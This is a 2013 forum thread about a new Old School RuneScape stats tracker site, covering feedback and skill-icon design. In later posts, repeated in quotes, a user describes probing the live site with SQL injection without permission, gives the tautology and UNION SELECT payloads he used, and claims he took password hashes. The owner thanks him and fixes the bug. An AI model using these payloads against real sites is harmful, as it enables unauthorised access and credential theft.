May 16, 201313 yr http://youtu.be/smtohPYlR3k just watch video. it explains everything i want to say.thank you :)
May 16, 201313 yr http://forum.tip.it/forum/335-old-school-runescape/ [bleep] OFF HOW ARE U SO [bleep]ING LUCKY U PIECE OF [bleep]ING SHIT [bleep] [bleep] [wagon] MUNCHER
May 16, 201313 yr Author http://forum.tip.it/...hool-runescape/ i don't know, if it will be good ideo to make similar post there, maybe someone can move this thread?
May 17, 201313 yr Looks alright and I wish you the best of luck, but Foot's website (http://crystalmathlabs.com/tracker/) looks to be able to do everything your tracker does and more, so personally I'll stick to using that. It doesn't mean there's no place for your site however; for the EOC I used both Runetrack and Runetracker, but for now your site doesn't have anything really that'll make me want to visit your site over what's already available.
May 17, 201313 yr Author Looks alright and I wish you the best of luck, but Foot's website (http://crystalmathlabs.com/tracker/) looks to be able to do everything your tracker does and more, so personally I'll stick to using that. It doesn't mean there's no place for your site however; for the EOC I used both Runetrack and Runetracker, but for now your site doesn't have anything really that'll make me want to visit your site over what's already available. thanks for feedback :)my site is still in beta. like, im opened for fresh ideas and willing to make them, just name what you want to see, sigs, races, just name it. :)
May 19, 201313 yr Author made some small adjustments:now site has clean urls- http://rs07tracker.com/progress/overall/nex-is-wet/ as it should have in first place. happy to announce, that few players have been asking about forum signatures to embed in forums- first thing i'll do when i have a break from finals.
May 28, 201313 yr Author On a design note, why does it use the updated live game skill icons? :/ i didn't liked the old school icons, and they are very small. also they didnt fit in design as good as new ones.
May 28, 201313 yr Looking good, but even though I prefer the updated, live game skill icons over the Old School ones, I think that the Old School icons would be better in this case, because it's a tracker for Old School, would make more sense to have graphics from Old School.
May 28, 201313 yr Author old ones are in ridiculus resolution, and new icons suits better in whole page. old ones looks like this-(29x29 px)
May 28, 201313 yr Surely we can get someone to manually fix them? Although it's quite funny that the two current live game trackers use the old school skill icons, while your Old School tracker uses the live game skill icons.
May 28, 201313 yr old ones are in ridiculus resolution, and new icons suits better in whole page.old ones looks like this-(29x29 px) The old ones can look nice too.
May 28, 201313 yr Well, out of some spare time, here is the set of oldshool icons, as a sprite - vertically centred and on a 35px horizontal grid, on transparent background For anyone who ever may have need for them! E: this version is better, a few pixels were on vacation in the last version.. E2: Forgot overall.
June 2, 201313 yr Thanks a lot for this. I really learned a lot of SQL injection from using this website. "View your prog" injection:The following shows all data points in your database in a single choppy graphalkan' or '1'='1 Combines the graph of alkan and leyatis in one!alkan' or Name='leyatis "Goals" search injection:Shows all goals in the search list' or '1'='1' union select * from goals where '1'='1 After the query above, I started doing' union select all 1,2,'a <FAILthen' union select all 1,2,3,'a <FAILthen' union select all 1,2,3,4,'a <FAILuntil finally this worked' union select all 1,2,3,4,5,6,7,'a <WINSince it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this.oh dear..
June 2, 201313 yr Author Thanks a lot for this. I really learned a lot of SQL injection from using this website. "View your prog" injection:The following shows all data points in your database in a single choppy graphalkan' or '1'='1 Combines the graph of alkan and leyatis in one!alkan' or Name='leyatis "Goals" search injection:Shows all goals in the search list' or '1'='1' union select * from goals where '1'='1 After the query above, I started doing' union select all 1,2,'a <FAILthen' union select all 1,2,3,'a <FAILthen' union select all 1,2,3,4,'a <FAILuntil finally this worked' union select all 1,2,3,4,5,6,7,'a <WINSince it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this. oh sh1t.thanks man, you helped a lot, i completely forgot to escape mysql strings.begginners mistakes. fixed now though.
June 2, 201313 yr Thanks a lot for this. I really learned a lot of SQL injection from using this website. "View your prog" injection:The following shows all data points in your database in a single choppy graphalkan' or '1'='1 Combines the graph of alkan and leyatis in one!alkan' or Name='leyatis "Goals" search injection:Shows all goals in the search list' or '1'='1' union select * from goals where '1'='1 After the query above, I started doing' union select all 1,2,'a <FAILthen' union select all 1,2,3,'a <FAILthen' union select all 1,2,3,4,'a <FAILuntil finally this worked' union select all 1,2,3,4,5,6,7,'a <WINSince it displayed 2 and 3 on the website, all I had to do is substitute the 2 or 3 with something like user(),@@version, or database(), and I could extract anything I wanted from your database. I even obtained 3 database usernames and password hashes. The password to root@localhost starts with "ca". I really suggest filtering your input a bit more to avoid more of this. oh sh1t.thanks man, you helped a lot, i completely forgot to escape mysql strings.begginners mistakes. fixed now though.Not a problem. I had a lot of fun. http://www.crystalmathlabs.com/tracker/
Create an account or sign in to comment